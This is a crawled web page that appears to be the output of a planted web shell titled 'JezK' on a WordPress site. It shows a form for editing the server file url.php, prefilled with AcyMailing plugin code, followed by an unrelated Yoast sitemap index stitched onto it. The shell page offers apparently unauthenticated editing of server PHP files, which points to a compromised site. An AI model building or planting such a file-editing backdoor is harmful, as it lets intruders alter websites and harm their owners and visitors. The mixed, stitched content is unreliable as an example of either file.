
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: url.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

defined('ABSPATH') || die('Restricted Access');

function acym_route(string $url, bool $xhtml = true): string
{
    return acym_baseURI().$url;
}

function acym_addPageParam(string $url, bool $ajax = false, bool $front = false): string
{
    preg_match('#^([a-z]+)(?:[^a-z]|$)#Uis', $url, $ctrl);

    if ($front) {
        $link = 'index.php?page='.ACYM_COMPONENT.'_front&amp;ctrl='.$url;
        if ($ajax) $link .= '&amp;'.acym_noTemplate();
    } else {
        $link = 'admin.php?page='.ACYM_COMPONENT.'_'.$ctrl[1].'&amp;ctrl='.$url;
        if ($ajax) {
            $link .= '&amp;action='.ACYM_COMPONENT.'_router&amp;'.acym_noTemplate();
        }
    }

    return $link;
}

function acym_baseURI(bool $pathonly = false): string
{
    if (acym_isAdmin()) {
        return admin_url();
    }

    return acym_rootURI();
}

function acym_rootURI(bool $pathonly = false, ?string $path = 'siteurl'): string
{
    $rootURI = rtrim(site_url(), '/').'/';

    // For WPML
    if (!acym_isAdmin()) {
        // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound -- WPML hook for integration.
        $wpmlSiteUrl = apply_filters('wpml_home_url', $rootURI);
        if ($wpmlSiteUrl !== $rootURI) {
            $rootURI = rtrim($wpmlSiteUrl, '/').'/';
        }
    }

    // For WordPress bedrock
    if (defined('CONTENT_DIR') &amp;&amp; substr($rootURI, -3) === 'wp/') {
        $rootURI = substr($rootURI, 0, -3);
    }

    return $rootURI;
}

function acym_completeLink(string $link, bool $popup = false, bool $redirect = false, bool $forceNoPopup = false): string
{
    if (($popup || acym_isNoTemplate()) &amp;&amp; $forceNoPopup == false) {
        $link .= '&amp;'.acym_noTemplate();
    }

    $link = acym_addPageParam($link);

    return acym_route($link);
}

/**
 * If you use it to prepare a POST ajax, make sure you add the action and page parameters to the data passed, it's not taken into account if it's only in the URL
 */
function acym_prepareAjaxURL(string $url): string
{
    return htmlspecialchars_decode(acym_route(acym_addPageParam($url, true)));
}

function acym_frontendLink(string $link, bool $complete = true, bool $sef = true): string
{
    return acym_rootURI().acym_addPageParam($link, true, true);
}

function acym_backendLink(string $link): string
{
    return admin_url().acym_addPageParam($link);
}

function acym_getMenu()
{
    return get_post();
}

function acym_parseUrl(string $url)
{
    return wp_parse_url($url);
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//ohmytrips.fr/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://ohmytrips.fr/post-sitemap.xml</loc>
		<lastmod>2026-09-26T17:32:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/page-sitemap.xml</loc>
		<lastmod>2026-09-25T15:37:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/category-sitemap.xml</loc>
		<lastmod>2026-09-26T17:32:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/author-sitemap.xml</loc>
		<lastmod>2025-10-07T21:23:02+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->